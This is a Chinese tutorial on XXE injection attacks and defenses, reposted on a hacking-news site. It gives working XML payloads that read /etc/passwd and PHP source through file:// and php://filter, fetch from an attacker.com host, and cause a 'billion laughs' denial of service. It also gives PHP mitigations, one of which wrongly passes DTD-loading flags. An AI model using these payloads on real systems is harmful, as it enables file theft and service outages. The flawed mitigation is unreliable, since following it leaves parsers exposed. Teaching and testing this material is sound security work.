科普:XXE注入攻击与防御

科普:XXE注入攻击与防御

入侵渗透访客2021-10-12 8:58:003955A+A-

  XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进?行处理时引发的安全问题.

  在XML1.0标准?里,XML文档结构?里定义了实体(entity)这个概念.实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容.如果在这个过程中引入了”污染”源,在对XML文档处理后则可能导致信息泄漏等安全问题.

  威胁

  XXE漏洞目前还未受到广泛关注,Wooyun上几个XXE引起的安全问题:

  pull-in任意文件遍历/下载

  从开源中国的某XXE漏洞到主站shell

  百度某功能XML实体注入

  百度某功能XML实体注入(二)借助XXE,攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等.

  对于不同XML解析器,对外部实体有不同处理规则,在PHP中默认处理的函数为: xml_parse和simplexml_load xml_parse的实现方式为expat库,默认情况不会解析外部实体,而simplexml_load默认情况下会解析外部实体,造成安全威胁.除PHP外,在Java,Python等处理xml的组件及函数中都可能存在此问题

  语法

  要写Payload,首先要对XML实体语法有一定了解

  XML中entity的定义语法为:

  <!DOCTYPE filename  [  <!ENTITY entity-name "entity-content"  ]> 如果要引用一个外部资源,可以借助各种协议 几个例子:

  file:///path/to/file.ext  http://url/file.ext  php://filter/read=convert.base64-encode/resource=conf.php  故构造几种简单的Payload模型如下:

  <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [  <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall> 亦可读取网站内容

  <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [  <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "http://attacker.com/text.txt" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall> 如果包含文件失败,可能是由于读取php等文件时文件本身包含的<等字符.可以使用Base64编码绕过,如:

  <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [  <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall> 0×03 攻击

  借助XXE,有几种可用且公开的攻击方式:

  拒绝服务

  POC

  <?xml version = "1.0"?> <!DOCTYPE lolz [  <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]> <lolz>&lol9;</lolz> POC中中先定义了lol实体,值为”lol”的字符串,后在下面又定义了lol2实体,lol2实体引用10个lol实体,lol3又引用了10个lol2实体的值,依此类推,到了最后在lolz元素中引用的lol9中,就会存在上亿个”lol”字符串此时解析数据时未做特别处理,即可能造成拒绝服务攻击。

  此外还有一种可能造成拒绝服务的Payload,借助读取/dev/random实现.

  内网信息

  借助各种协议如http,XXE可以协助扫描内网,可能可以访问到内网开放WEB服务的Server,并获取其他信息

  XXE注入攻击与防御

  文件读取

  最常规也是最有效的利用思路

  <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [  <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall> 附上两张截图,实现文件读取的过程

  XXE注入攻击与防御

  XXE注入攻击与防御

  防御

  1.检查所使用的底层xml解析库,默认禁止外部实体的解析

  2.使用第三方应用代码及时升级补丁

  3.同时增强对系统的监控,防止此问题被人利用

  对于PHP,由于simplexml_load_string函数的XML解析问题出在libxml库上,所以加载实体前可以调用这样一个函数

  <?php libxml_disable_entity_loader(true);  ?> 以进行防护,对于XMLReader和DOM方式解析,可以参考如下代码:

  <?php // with the XMLReader functionality:  $doc = XMLReader::xml($badXml,'UTF-8',LIBXML_NONET);  // with the DOM functionality:  $dom = new DOMDocument();  $dom->loadXML($badXml,LIBXML_DTDLOAD|LIBXML_DTDATTR);  ?>>  0×05 参考

  https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)

  http://websec.io/2012/08/27/Preventing-XEE-in-PHP.html

  http://cn2.php.net/libxml_disable_entity_loader

  http://projects.webappsec.org/w/page/13247004/XML%20Injection

  http://drops.wooyun.org/papers/1911

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 5条评论
  • 忿咬轻禾2022-05-28 17:02:13
  • bxml库上,所以加载实体前可以调用这样一个函数  <?php libxml_disable_entity_loader(true);  ?> 以进行防护,对于XMLRe
  • 瑰颈饮酎2022-05-28 18:31:56
  • 串,后在下面又定义了lol2实体,lol2实体引用10个lol实体,lol3又引用了10个lol2实体的值,依此类推,到了最后在lolz元素中引用的lol9中,就会存在上亿个”lol”字
  • 慵吋绾痞2022-05-28 14:37:13
  • -in任意文件遍历/下载  从开源中国的某XXE漏洞到主站shell  百度某功能XML实体注入  百度某功能XML实体注入(二)借助XXE,攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等.  对于不同XML解析器,对外部实体有不同处理
  • 寻妄矫纵2022-05-28 15:07:05
  • 代码:  <?php // with the XMLReader functionality:  $doc = XMLReader::xml($badXml,'UTF-8',LIBXML_NONET);  // with the DOM functionality:  $dom = new D
  • 孤鱼挽鹿2022-05-28 23:31:53
  • arse和simplexml_load xml_parse的实现方式为expat库,默认情况不会解析外部实体,而simplexml_load默认情况下会解析外部实体,造成安全威胁.除PHP外,在Java

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理